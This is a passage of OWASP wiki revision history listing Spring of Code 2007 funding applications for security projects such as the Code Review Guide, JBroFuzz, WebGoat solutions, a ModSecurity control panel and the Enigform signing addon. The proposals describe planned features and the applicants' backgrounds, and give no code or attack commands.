&lt;br /&gt;
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the international security community, and I firmly believe Enigform is my greatest idea so far.&lt;br /&gt;
&lt;br /&gt;
== Eoin Keary - Code review Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the OWASP Code review guide during this period.&lt;br /&gt;
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. &lt;br /&gt;
&lt;br /&gt;
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.&lt;br /&gt;
&lt;br /&gt;
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.&lt;br /&gt;
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as web services.&lt;br /&gt;
 &lt;br /&gt;
The code review process and procedure also need to be covered. A guide to establishing a mature code review process also needs to be done.&lt;br /&gt;
Code review methodologies also need to be discussed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the code review guide:&lt;br /&gt;
* Add additional areas relating to the code review process such as:&lt;br /&gt;
** Benefits and pitfalls&lt;br /&gt;
** Methodology&lt;br /&gt;
** The code review process&lt;br /&gt;
*** Transactional analysis&lt;br /&gt;
*** Managing the code review process&lt;br /&gt;
*** Assigning risk to findings&lt;br /&gt;
&lt;br /&gt;
** Technical guides&lt;br /&gt;
*** Language specific best practice &lt;br /&gt;
*** Java &lt;br /&gt;
*** .NET &lt;br /&gt;
*** PHP &lt;br /&gt;
*** MySQL &lt;br /&gt;
*** Stored Procs &lt;br /&gt;
*** C/C++ &lt;br /&gt;
&lt;br /&gt;
** Code review by vulnerability:&lt;br /&gt;
*** Reviewing Code for Buffer Overruns and Overflows &lt;br /&gt;
*** Reviewing Code for OS Injection&lt;br /&gt;
*** Reviewing Code for SQL Injection&lt;br /&gt;
*** Reviewing Code for Data Validation&lt;br /&gt;
*** Reviewing code for XSS issues&lt;br /&gt;
*** Reviewing Code for Error Handling&lt;br /&gt;
*** Reviewing Code for Logging Issues&lt;br /&gt;
*** Reviewing The Secure Code Environment&lt;br /&gt;
*** Reviewing code for Authorization Issues&lt;br /&gt;
*** Reviewing code for Authentication Issues&lt;br /&gt;
*** Reviewing code for Session Integrity&lt;br /&gt;
*** Reviewing code for Cross Site Request Forgery&lt;br /&gt;
*** Reviewing code for Cryptography implementation issues&lt;br /&gt;
*** Reviewing code for Dangerous HTTP Methods (Deployment)&lt;br /&gt;
*** Race Conditions &lt;br /&gt;
&lt;br /&gt;
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I used to head up the code review team as part of the application security group at Fidelity Investments and have 5+ years of experience with the secure code review process. &lt;br /&gt;
I was also the lead of the Testing Guide until V2 was published via the Autumn of Code. &lt;br /&gt;
&lt;br /&gt;
I have always delivered any work I have volunteered for on time. &lt;br /&gt;
 &lt;br /&gt;
I have been involved in OWASP projects for 2-3 years now and have always been an active contributor.&lt;br /&gt;
&lt;br /&gt;
== Paolo Perego - Owasp Orizon Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
The Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project was born in 2006 as an answer to the lack of a common engine and library usable by open-source code review tools.&lt;br /&gt;
&lt;br /&gt;
I'm proposing that, during the Spring of Code 2007 period, I'll complete the static analysis API and the Java source code enforcement objects.&lt;br /&gt;
&lt;br /&gt;
Sometimes a complete code review approach is not suitable for most customers who want to harden code that is approaching release stage. For that reason, I started writing Java objects that embed most of the security checks against common web vulnerabilities (XSS, SQL injection, session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.&lt;br /&gt;
&lt;br /&gt;
I do believe that a common set of APIs and a common safe coding best practices library is one of the most important goals in bringing application security to developers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Completing the static code review API section:&lt;br /&gt;
* improving the programming language to XML translator&lt;br /&gt;
* improving the security best practices code review scan library&lt;br /&gt;
* improving the secure coding best practices library&lt;br /&gt;
* writing the pattern matching scan using the aforementioned libraries&lt;br /&gt;
Writing the Java source code enforcement objects:&lt;br /&gt;
* writing an object to handle form data values to avoid XSS&lt;br /&gt;
* writing an object to handle form data values to avoid SQL Injection&lt;br /&gt;
* writing an object to handle HttpRequest and HttpSession objects&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
Owasp Orizon is the first Owasp project I'm involved in. I'm also a contributor to the Owasp Italian chapter managed by Matteo Meucci, and I give talks at various events about application security and safe coding best practices.&lt;br /&gt;
&lt;br /&gt;
I'm a security consultant working in ethical hacking, and we're approaching code review and safe coding topics right now.&lt;br /&gt;
I'm a developer too, so I also understand the &amp;quot;dark side&amp;quot; of the problem: developing code with security in mind.&lt;br /&gt;
&lt;br /&gt;
I work using the &amp;quot;release early, release often&amp;quot; paradigm, so as to be concrete and let other people have something usable to work with.&lt;br /&gt;
&lt;br /&gt;
== Sebastien Deleersnyder - OWASP Education Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
This Education project aims to provide building blocks of web application security information. These modules can be combined into education tracks targeting different audiences. &lt;br /&gt;
&lt;br /&gt;
Web application security education and awareness is needed throughout the entire organization; each area and level of an organization has specific needs and requirements regarding education. A manager needs different information than a security professional or developer. Novices to the profession require different training than people with several years of experience. &lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
Currently the project goals are to create Educational Tracks: &lt;br /&gt;
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past&lt;br /&gt;
* A &amp;quot;Web Application Security Primer&amp;quot; Track for beginners (4 hours) &lt;br /&gt;
* A &amp;quot;What developers should know on Web Application Security&amp;quot; Track for developers (4 hours) &lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''': &lt;br /&gt;
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.&lt;br /&gt;
&lt;br /&gt;
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to web application security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information into reusable modules that can be combined into educational tracks. It is my belief that awareness is an important cornerstone of building secure web applications, and this project will actively support that.&lt;br /&gt;
&lt;br /&gt;
If we are granted SpoC 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.&lt;br /&gt;
&lt;br /&gt;
* '''More details''': &lt;br /&gt;
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.&lt;br /&gt;
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.&lt;br /&gt;
&lt;br /&gt;
== Subere - OWASP JBroFuzz Project ==&lt;br /&gt;
&lt;br /&gt;
==== Overview ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.&lt;br /&gt;
&lt;br /&gt;
==== Fuzzing ==== &lt;br /&gt;
&lt;br /&gt;
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.&lt;br /&gt;
&lt;br /&gt;
==== Objectives ==== &lt;br /&gt;
&lt;br /&gt;
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addition of new functionality by means of independent tabs. The key tabs proposed to be added during the Spring of Code 2007 are (details in the next section):&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab'''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab'''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing using HTTPClient'''&lt;br /&gt;
* '''Blind SQL Injection Fuzzing Tab'''&lt;br /&gt;
&lt;br /&gt;
At the same time, the following existing tabs need to be updated and made more robust (details in next section):&lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs'''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue'''&lt;br /&gt;
* '''Update Generators file format'''&lt;br /&gt;
* '''Include SOAP and XML fuzzing'''&lt;br /&gt;
&lt;br /&gt;
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.&lt;br /&gt;
&lt;br /&gt;
==== Deliverables ==== &lt;br /&gt;
&lt;br /&gt;
Based on the above, the new code elements that will be added are as follows:&lt;br /&gt;
&lt;br /&gt;
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching Google automated search rules''&lt;br /&gt;
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute-force NTLM over HTTP/S.''&lt;br /&gt;
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''&lt;br /&gt;
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''&lt;br /&gt;
&lt;br /&gt;
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: &lt;br /&gt;
&lt;br /&gt;
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''&lt;br /&gt;
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''&lt;br /&gt;
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''&lt;br /&gt;
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''&lt;br /&gt;
&lt;br /&gt;
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.&lt;br /&gt;
&lt;br /&gt;
==== Background ==== &lt;br /&gt;
&lt;br /&gt;
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of approx. 5000 downloads in recent months. &lt;br /&gt;
&lt;br /&gt;
Coming from a strong Java background (5+ years), I decided to implement and release JBroFuzz in order to initially simplify penetration testing processes that relate to web application and network protocol fuzzing.&lt;br /&gt;
&lt;br /&gt;
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Why should JBroFuzz be sponsored? ==== &lt;br /&gt;
&lt;br /&gt;
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.&lt;br /&gt;
&lt;br /&gt;
Keeping the code platform independent adds a huge advantage. &lt;br /&gt;
&lt;br /&gt;
Receiving an OWASP grant from the Spring of Code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.&lt;br /&gt;
&lt;br /&gt;
== Joshua Perrymon - OWASP LiveCD Project ==&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I am proposing that I complete the second version of the OWASP LiveCD during this period.&lt;br /&gt;
The first version of the LiveCD is now available and includes many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security professionals to perform application testing and training. &lt;br /&gt;
&lt;br /&gt;
In its current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This should start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also include the wiki and ALL the tools developed for OWASP.&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
&lt;br /&gt;
Update of the LiveCD:&lt;br /&gt;
* Complete OWASP branding&lt;br /&gt;
* Add OWASP wiki&lt;br /&gt;
* Add encryption capabilities&lt;br /&gt;
* Add more OWASP tools&lt;br /&gt;
* Add more pen-test tools such as VOIP, RFID, Bluetooth, Wireless, etc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Why I should be sponsored for the project''':&lt;br /&gt;
&lt;br /&gt;
I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference between the OWASP LiveCD and other live CDs is going to be the regularity of updates. If sponsorship can be obtained, the CD could be updated on a monthly basis, not once a year like other live CDs. The CD will also include specialty tools and documentation to perform VOIP, RFID, Bluetooth and wireless security assessments.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Mark Curphey – The OWASP Web Security Certification Framework ==&lt;br /&gt;
&lt;br /&gt;
'''Problem'''&lt;br /&gt;
 &lt;br /&gt;
PCI DSS is attracting a lot of criticism for a lot of valid reasons. &lt;br /&gt;
 &lt;br /&gt;
http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/&lt;br /&gt;
&lt;br /&gt;
http://blogs.csoonline.com/node/210&lt;br /&gt;
&lt;br /&gt;
http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html&lt;br /&gt;
&lt;br /&gt;
The list is of course long and not appropriate here, and while it's easy to knock PCI, there is nothing better out there. &lt;br /&gt;
&lt;br /&gt;
'''Solution and Deliverables'''&lt;br /&gt;
&lt;br /&gt;
Rather than my continuing to say what's wrong with PCI DSS, it seems to me that OWASP is a perfect forum to simply create and publish "better criteria". These can either be adopted and implemented by an organization like OWASP or considered for incorporation into PCI or other security standards. We won't get bogged down in the politics up-front, but hold something good up to the world for people to adopt. This project would of course draw on and bring together many of the other OWASP projects, including the Guide (what is a secure web app), the Testing Guide (how to test for a secure web app), WebGoat (part of how to certify that an individual understands and can find web app issues), etc. Many of those projects may not be complete or a perfect fit today, but this project can bring a common connecting theme to a lot of very valuable IP that OWASP has built over the years. I will also create it in such a way that a corporation could adopt/adapt it themselves, as well as an industry. Where other OWASP projects are not complete or currently suitable I will build a requirements doc that can be considered by those teams if they feel it appropriate. &lt;br /&gt;
&lt;br /&gt;
This project would address the following:&lt;br /&gt;
&lt;br /&gt;
'''Standard''' &lt;br /&gt;
*A complete auditable (important) web site security standard suitable for modern e-commerce companies including&lt;br /&gt;
**The technical things people should care about&lt;br /&gt;
**The operational  / management things people should care about&lt;br /&gt;
'''Certification Model''' &lt;br /&gt;
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc). This will include for example the model for certifying auditors (including the actual test program); checklists and forms for auditors to complete and other supporting material. &lt;br /&gt;
&lt;br /&gt;
Essentially it is a complete blueprint that an organisation like OWASP or a regulatory body would need to run a web site security certification program, complete with the supporting material to implement it.&lt;br /&gt;
&lt;br /&gt;
Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish, but I think it is very important for the industry and potentially for OWASP. I wanted to gauge the interest by first posting this.&lt;br /&gt;
&lt;br /&gt;
== Erwin Geirnaert - OWASP Java Project ==&lt;br /&gt;
&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
I would like to help the OWASP Java Project to gather all Java security related information and to document any domains that lack documentation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
The main objective I see is to gather all information in one place, where security experts and developers can find the information they need.&lt;br /&gt;
In order to get there, I need to collect all information in the OWASP Wiki, ask people if they want to donate it to OWASP so that we can include it as public material, add URLs, white-papers, references to books, ... And if time permits, write some documentation myself.&lt;br /&gt;
&lt;br /&gt;
One deliverable is the OWASP Top 10 for J2EE applications with clear examples of vulnerabilities and mitigations.&lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''':&lt;br /&gt;
I have more than 10 years of experience in Java and J2EE, and in the last 6 years I have tested and broken a lot of web applications. I have also given some very successful J2EE security courses and web security courses. I have spoken at different conferences about application security in Europe.&lt;br /&gt;
And I am responsible for the security track at Javapolis, one of the biggest Java conferences in Europe.&lt;br /&gt;
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training, ...&lt;br /&gt;
I'm also a member of the OWASP Belgium board that started in March 2007.&lt;br /&gt;
&lt;br /&gt;
== Erwin Geirnaert - OWASP WebGoat Solutions Guide ==&lt;br /&gt;
&lt;br /&gt;
* '''Executive Summary''':&lt;br /&gt;
WebGoat is used by a lot of people to learn about web application security and the different vulnerabilities. But it takes a lot of time to grasp how the tools like WebScarab work and how to use them effectively in WebGoat. I propose to create a walkthrough of the lessons in WebGoat so that people can learn from the solutions, without spoiling the fun.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''Objectives and Deliverables''':&lt;br /&gt;
The WebGoat Solutions Guide is a document that can be bundled with WebGoat. Each lesson contains a detailed solution with screenshots and tools. I created a PDF with the solution for WebGoat 4.0 but this is too big to load (15 MB) and is not very practical.&lt;br /&gt;
&lt;br /&gt;
After a discussion with Bruce about this, we think that the solutions should be made like the existing Lessons Plan so it is easier to maintain and update when a lesson changes. This means that there will be documentation folder and an individual solution for each lesson. &lt;br /&gt;
&lt;br /&gt;
* '''Why you should be sponsored for the project''':&lt;br /&gt;
I have more than 10 years of experience in Java and J2EE, and in the last 6 years I have tested and broken a lot of web applications. I have also given some very successful J2EE security courses and web security courses. I have spoken at different conferences about application security in Europe.&lt;br /&gt;
And I am responsible for the security track at Javapolis, one of the biggest Java conferences in Europe.&lt;br /&gt;
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training, ...&lt;br /&gt;
I'm also a member of the OWASP Belgium board that started in March 2007.&lt;br /&gt;
&lt;br /&gt;
== Bunyamin Demir – OWASP WeBekci Project ==&lt;br /&gt;
&lt;br /&gt;
==== Executive Summary: ====&lt;br /&gt;
&lt;br /&gt;
Web application firewalls (WAF) are gaining importance among the information security technologies designed to protect web sites from attack. WAF solutions prevent attacks that network firewalls and intrusion detection systems can't and they require no modification of application source code. ModSecurity [http://www.modsecurity.org/] is an open source web application firewall that runs as an Apache module. It is an embeddable web application firewall and it provides protection from a range of attacks against web applications. It is an open source project available to everyone; it however does not come with an admin panel. &lt;br /&gt;
&lt;br /&gt;
I decided to provide this essential tool with a control panel which I believe will ease and thus encourage its usage.&lt;br /&gt;
&lt;br /&gt;
ModSecurity allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure. My main goal is to analyze attacks and generate rules to change the configuration of the ModSecurity accordingly.&lt;br /&gt;
&lt;br /&gt;
ModSecurity has a feature called the “flexible rule engine” at the heart of its attack prevention capability. It uses ModSecurity’s “Rule Language” (a programming language designed to work with HTTP transaction data). It is easy to use and flexible; yet system administrators need to learn its own rules to create what are called “Certified ModSecurity Rules” to be implemented. My control panel will automate the major code generation in Rule Language. &lt;br /&gt;
&lt;br /&gt;
==== Objectives and Deliverables: ====&lt;br /&gt;
&lt;br /&gt;
* '''Configuration''' : Will add all configuration parameters&lt;br /&gt;
* '''Rule Generator''': Will write all the Rules in Rule Language&lt;br /&gt;
* '''Logging'''       : Auditlog and debuglog will be added.&lt;br /&gt;
* '''Multiple-DB'''   : Will add PostgreSql and Sqlite support.&lt;br /&gt;
&lt;br /&gt;
==== Why I should be sponsored for the project: ====&lt;br /&gt;
&lt;br /&gt;
I am involved with OWASP Turkey [http://www.owasp.org/index.php/Turkey] and am very much interested in WAF. Even though this is my first project for OWASP, I am very much interested in every aspect of ModSecurity. With SpoC007’s support I will finalize my work on OWASP WeBekci [http://www.owasp.org/index.php/Category:OWASP_WeBekci_Project].&lt;br /&gt;
&lt;br /&gt;
== Eric Sheridan and Dr. Goran Trajkovski - The Scholastic Application Security Assessment Project ==&lt;br /&gt;
&lt;br /&gt;
=== ABSTRACT ===&lt;br /&gt;
&lt;br /&gt;
One of the major goals of the Open Web Application Security Project is to educate developers in the field of application software security. Understanding the risks and threats associated with web application software is pivotal in building a mature application security process. While OWASP has made a significant impact in the professional industry, more time and energy should be focused towards the academic community. It is an unfortunate fact that most universities do not require a stringent software security course for their computer science students. Consequently, most young developers do not have the ability to assess and mitigate the risks and threats for their own applications. It is for this reason that we believe the Open Web Application Security Project should fund an initiative to encourage the adaptation of application software security methodologies in the academic course curriculum.&lt;br /&gt;
&lt;br /&gt;
The Scholastic Application Security Project is intended to be the first step towards integrating security requirements in academic course curriculums. The primary goal of the project is to give students hands-on experience performing application security assessments using the tools and documentation found at http://www.owasp.org. The assessment, led by an application security professional, will demonstrate to students how the information and tools found at OWASP can be used to assess and ultimately increase the overall security posture of a web application. &lt;br /&gt;
&lt;br /&gt;
This project contributes towards bridging the gap between academia and industry, by equipping students with hands-on ready-for-the-job-market skills in the application software securing industry.&lt;br /&gt;
&lt;br /&gt;
=== PARTICIPANTS ===&lt;br /&gt;
&lt;br /&gt;
The Scholastic Application Security Assessment Project requires that college level students, led by an application security professional, perform a security audit on an open source web application using the tools and information available at OWASP.&lt;br /&gt;
&lt;br /&gt;
::*'''Application Security Professional''' – Eric Sheridan ([http://www.aspectsecurity.com Aspect Security])&lt;br /&gt;
::*'''Towson University (TU) Partner''' – Dr. Goran Trajkovski, Towson University (http://www.towson.edu)&lt;br /&gt;
::*'''Students''' – Students of TU’s Application Software Security Course (COSC 458), nominated by the TU Partner&lt;br /&gt;
::*'''Web Application''' – The Open WebMail Project (http://openwebmail.org/)&lt;br /&gt;
&lt;br /&gt;
=== OWASP UTILIZATION ===&lt;br /&gt;
&lt;br /&gt;
The Scholastic Application Security Assessment Project requires heavy utilization of existing OWASP tools and utilities. Through this requirement, the project will illustrate the fact that existing OWASP resources can be used and heavily relied upon in a professional security audit. The following is a list of notable OWASP resources whose use will be documented throughout the assessment:&lt;br /&gt;
&lt;br /&gt;
::*'''OWASP Top Ten 2007''' - The security critical areas that the students will assess in the review&lt;br /&gt;
::*'''OWASP Testing Guide v2''' – The primary resource for building penetration testing cases&lt;br /&gt;
::*'''OWASP Guide''' – The primary resource for technical details pertaining to a technology and/or vulnerability&lt;br /&gt;
::*'''OWASP WebScarabNG''' – The primary proxy utility used throughout the assessment&lt;br /&gt;
&lt;br /&gt;
=== THE FINAL REPORT ===&lt;br /&gt;
&lt;br /&gt;
Students are required to follow the principle of “responsible disclosure” during the course of the security assessment. The developers of the open source application will be notified if any significant issues are found. Once the assessment is complete, a final report will be delivered to the application developers and the appropriate OWASP Spring of Code personnel. For each finding in the report, the students will be required to describe how the tools and information found at OWASP were used in the discovery.&lt;br /&gt;
&lt;br /&gt;
=== HOW DOES OWASP BENEFIT? ===&lt;br /&gt;
&lt;br /&gt;
The Scholastic Application Security Assessment Project is specifically designed to benefit the OWASP brand:&lt;br /&gt;
&lt;br /&gt;
''The OWASP Community…''&lt;br /&gt;
::*will be provided a case study proving that the resources available at OWASP can be utilized in an academic environment, that can be later used in advertising the OWASP efforts to similar programs as the one at TU.&lt;br /&gt;
::*will be providing students a hands-on experience in learning and testing for the latest web application security threats, thus potentially enlarging the OWASP community of contributors and supporters.&lt;br /&gt;
::*will be addressing the need to educate developers in the security critical areas.&lt;br /&gt;
::*will be seen as offering a professional level service to another open source project.&lt;br /&gt;
::*will be addressing one of the root causes of application software insecurity.&lt;br /&gt;
&lt;br /&gt;
=== BACKGROUND ===&lt;br /&gt;
&lt;br /&gt;
'''Eric Sheridan:'''&lt;br /&gt;
&lt;br /&gt;
::*Earned a Bachelor’s of Science in Computer Science from Towson University&lt;br /&gt;
::*Graduate Student in Information Security at Johns Hopkins University&lt;br /&gt;
::*Application Security Engineer at Aspect Security&lt;br /&gt;
::*Lead of the OWASP Stinger Project and the OWASP Validation Project&lt;br /&gt;
&lt;br /&gt;
'''Goran Trajkovski, PhD:'''&lt;br /&gt;
&lt;br /&gt;
::*Has been teaching the Application Software Security course for the Computer Security undergraduate and master-level majors at TU since 2004 (TU has been a Center of Excellence in Information Assurance, designated by the NSA since 2002).&lt;br /&gt;
::*Assistant professor of Computer and Information Sciences at Towson University, and Director of its Cognitive Agency and Robotics Lab (CARoL).&lt;br /&gt;
::*Has led curricular efforts in integrating application software security topics throughout the Computer Science and Computer Information Sciences curriculum&lt;br /&gt;
::*12 years of full time teaching experience in higher ed.&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17413</id>
		<title>OWASP Spring Of Code 2007 Applications</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17413"/>
				<updated>2007-03-26T10:14:27Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]&lt;br /&gt;
&lt;br /&gt;
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''&lt;br /&gt;
&lt;br /&gt;
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what to do once you have completed your Application&lt;br /&gt;
&lt;br /&gt;
---------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:&lt;br /&gt;
&lt;br /&gt;
== {Your first name or Alias} - {Project name} ==&lt;br /&gt;
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].&lt;br /&gt;
&lt;br /&gt;
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic.  We strongly suggest that you include the following information in your proposal.&lt;br /&gt;
&lt;br /&gt;
* Your educational and professional background&lt;br /&gt;
&lt;br /&gt;
* Application security experience and accomplishments&lt;br /&gt;
&lt;br /&gt;
* Participation and leadership in open communities&lt;br /&gt;
&lt;br /&gt;
* The opportunity, challenges, issues or need your proposal addresses&lt;br /&gt;
&lt;br /&gt;
* Objectives or ways in which you will meet the goal(s)&lt;br /&gt;
&lt;br /&gt;
* Specific activities and who will carry out these activities&lt;br /&gt;
&lt;br /&gt;
* Specific deliverables and a rough project schedule so we can track progress&lt;br /&gt;
&lt;br /&gt;
* Long-term vision for the project&lt;br /&gt;
&lt;br /&gt;
* Any other reasons why you and your project should be selected&lt;br /&gt;
&lt;br /&gt;
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==&lt;br /&gt;
&lt;br /&gt;
I am a 25-year-old independent security consultant from Buenos Aires, Argentina, who has contributed to the world of&lt;br /&gt;
information systems security since 1994, when BBSes and Linux still lived together.&lt;br /&gt;
&lt;br /&gt;
A quick search for buanzo on Google [http://www.google.com/search?hl=en&amp;amp;q=buanzo&amp;amp;btnG=Google+Search] will provide all necessary details about my professional and community background. For verifiable experience, you could also check my Rent a Coder profile [http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].&lt;br /&gt;
&lt;br /&gt;
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].&lt;br /&gt;
&lt;br /&gt;
=== Accomplishments ===&lt;br /&gt;
&lt;br /&gt;
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed &lt;br /&gt;
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written&lt;br /&gt;
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing&lt;br /&gt;
an Internet Draft to be proposed for RFC regarding Enigform.&lt;br /&gt;
&lt;br /&gt;
=== Community ===&lt;br /&gt;
&lt;br /&gt;
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html]. I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [http://www.solar.org.ar]. I've been an active member of the FLOSS community since 1996, having written articles in magazines [http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt], made TV, radio&lt;br /&gt;
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time through my sites, forums and blogs,&lt;br /&gt;
answering questions in mailing lists and helping coordinate some local LUGs. I also manage the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].&lt;br /&gt;
&lt;br /&gt;
=== My Project ===&lt;br /&gt;
&lt;br /&gt;
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented like any OpenPGP based technology, render man-in-the-middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for HTTP and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].&lt;br /&gt;
